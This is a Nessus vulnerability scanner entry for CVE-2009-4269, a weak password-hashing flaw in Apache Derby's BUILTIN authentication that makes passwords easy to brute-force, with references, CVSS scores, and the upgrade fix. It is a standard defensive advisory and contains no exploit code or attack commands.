Apache Derby 'BUILTIN' Authentication Insecure Password Hashing

This script is Copyright (C) 2011-2014 Tenable Network Security, Inc.


Synopsis :

The remote database server is running software known to be
susceptible to brute-forcing of passwords.

Description :

According to its self-reported version number, the installation of
Apache Derby running on the remote server performs a transformation on
passwords that removes half the bits from most of the characters
before hashing. This leads to a large number of hash collisions,
letting passwords be easily brute-forced. This vulnerability only
affects the BUILTIN authentication method.

Note that Nessus has not tested for the issue but has instead relied
only on the application's self-reported version number.

See also :

https://issues.apache.org/jira/browse/DERBY-4483
http://db.apache.org/derby/releases/release-10.6.1.0.html
http://marcellmajor.com/derbyhash.html

Solution :

Upgrade to Apache Derby 10.6.1.0 or later.

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS Temporal Score : 6.2
(CVSS2#E:F/RL:OF/RC:C)
Public Exploit Available : true

Family: Databases

Nessus Plugin ID: 52536 ()

Bugtraq ID: 42637

CVE ID: CVE-2009-4269